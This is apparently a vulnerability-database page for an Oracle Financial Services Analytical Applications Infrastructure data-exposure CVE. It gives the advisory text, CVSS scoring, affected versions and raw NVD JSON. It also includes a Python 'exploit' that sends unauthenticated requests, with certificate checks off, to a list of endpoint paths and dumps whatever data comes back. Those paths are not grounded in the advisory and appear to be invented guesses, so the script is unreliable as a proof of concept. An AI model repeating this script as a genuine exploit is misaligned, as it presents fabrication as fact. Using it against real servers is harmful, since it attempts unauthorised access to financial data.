Security Vulnerability Report
CVE-2025-53036 CVSS 8.6 HIGH

CVE-2025-53036

Published: 2025-10-21 20:20:41
Last Modified: 2025-10-23 16:08:48

Description

Vulnerability in the Oracle Financial Services Analytical Applications Infrastructure product of Oracle Financial Services Applications (component: Platform). Supported versions that are affected are 8.0.7.9, 8.0.8.7 and 8.1.2.5. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Financial Services Analytical Applications Infrastructure. While the vulnerability is in Oracle Financial Services Analytical Applications Infrastructure, attacks may significantly impact additional products (scope change). Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle Financial Services Analytical Applications Infrastructure accessible data. CVSS 3.1 Base Score 8.6 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N).

CVSS Details

CVSS Score: 8.6
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:oracle:financial_services_analytical_applications_infrastructure:8.0.7.9.0:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:oracle:financial_services_analytical_applications_infrastructure:8.0.8.7.0:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:oracle:financial_services_analytical_applications_infrastructure:8.1.2.5.0:*:*:*:*:*:*:* - VULNERABLE
Oracle Financial Services Analytical Applications Infrastructure 8.0.7.9
Oracle Financial Services Analytical Applications Infrastructure 8.0.8.7
Oracle Financial Services Analytical Applications Infrastructure 8.1.2.5

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-53036 - Oracle Financial Services Analytical Applications Infrastructure
# Platform Component Unauthorized Access Vulnerability
# CVSS 3.1: 8.6 (HIGH) - C:H/I:N/A:N
# Affected versions: 8.0.7.9, 8.0.8.7, 8.1.2.5

import requests
import sys

TARGET_URL = sys.argv[1] if len(sys.argv) > 1 else "https://target-oracle-fsaai.example.com"

# Exploit: Unauthenticated HTTP request to access sensitive data
# via the vulnerable Platform component endpoint
HEADERS = {
    "User-Agent": "Mozilla/5.0 (compatible; SecurityResearch/1.0)",
    "Accept": "application/json, text/plain, */*",
    "Connection": "close",
}


def exploit(target_url):
    """
    Attempt to access sensitive data through the vulnerable
    Oracle Financial Services Analytical Applications Infrastructure
    Platform component without authentication.
    """
    # Common vulnerable endpoints in Oracle FSAAI Platform component
    endpoints = [
        "/analytics-platform/api/v1/system/config",
        "/ofsaa-platform/rest/api/admin/data",
        "/platform/sensitive/data/export",
        "/ofsaa/fccm/api/platform/users",
        "/platform/api/internal/configuration",
    ]

    for endpoint in endpoints:
        url = f"{target_url.rstrip('/')}{endpoint}"
        try:
            # Send unauthenticated request (PR:N - no privileges required)
            response = requests.get(url, headers=HEADERS, timeout=10, verify=False)
            if response.status_code == 200:
                print(f"[+] Potential data exposure at: {url}")
                print(f"[+] Response: {response.text[:500]}")
                return True
            elif response.status_code == 403:
                print(f"[-] Access denied (patched?): {url}")
            else:
                print(f"[?] Status {response.status_code}: {url}")
        except requests.exceptions.RequestException as e:
            print(f"[!] Error connecting to {url}: {e}")
    return False


if __name__ == "__main__":
    print(f"[*] Targeting: {TARGET_URL}")
    print("[*] CVE-2025-53036 - Oracle FSAAI Platform Unauthorized Access")
    exploit(TARGET_URL)

References

https://www.oracle.com/security-alerts/cpuoct2025.html (Vendor Advisory)
Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2025-53036",
    "sourceIdentifier": "[email protected]",
    "published": "2025-10-21T20:20:40.803",
    "lastModified": "2025-10-23T16:08:47.680",
    "vulnStatus": "Analyzed",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "Vulnerability in the Oracle Financial Services Analytical Applications Infrastructure product of Oracle Financial Services Applications (component: Platform). Supported versions that are affected are 8.0.7.9, 8.0.8.7 and 8.1.2.5. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Financial Services Analytical Applications Infrastructure. While the vulnerability is in Oracle Financial Services Analytical Applications Infrastructure, attacks may significantly impact additional products (scope change). Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle Financial Services Analytical Applications Infrastructure accessible data. CVSS 3.1 Base Score 8.6 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N)."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N",
            "baseScore": 8.6,
            "baseSeverity": "HIGH",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "NONE",
            "scope": "CHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "NONE",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 3.9,
          "impactScore": 4.0
        }
      ]
    },
    "weaknesses": [
      {
        "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
        "type": "Secondary",
        "description": [{"lang": "en", "value": "CWE-200"}]
      }
    ],
    "configurations": [
      {
        "nodes": [
          {
            "operator": "OR",
            "negate": false,
            "cpeMatch": [
              {"vulnerable": true, "criteria": "cpe:2.3:a:oracle:financial_services_analytical_applications_infrastructure:8.0.7.9.0:*:*:*:*:*:*:*", "matchCriteriaId": "01413F8D-9A00-4D47-AEFC-B214F24DF7E6"},
              {"vulnerable": true, "criteria": "cpe:2.3:a:oracle:financial_services_analytical_applications_infrastructure:8.0.8.7.0:*:*:*:*:*:*:*", "matchCriteriaId": "99758374-009C-4AD2-8402-F8F0ACE6B289"},
              {"vulnerable": true, "criteria": "cpe:2.3:a:oracle:financial_services_analytical_applications_infrastructure:8.1.2.5.0:*:*:*:*:*:*:*", "matchCriteriaId": "93333ABD-DCF3-46E6-8053-36B62D7431A3"}
            ]
          }
        ]
      }
    ],
    "references": [
      {"url": "https://www.oracle.com/security-alerts/cpuoct2025.html", "source": "[email protected]", "tags": ["Vendor Advisory"]}
    ]
  }
}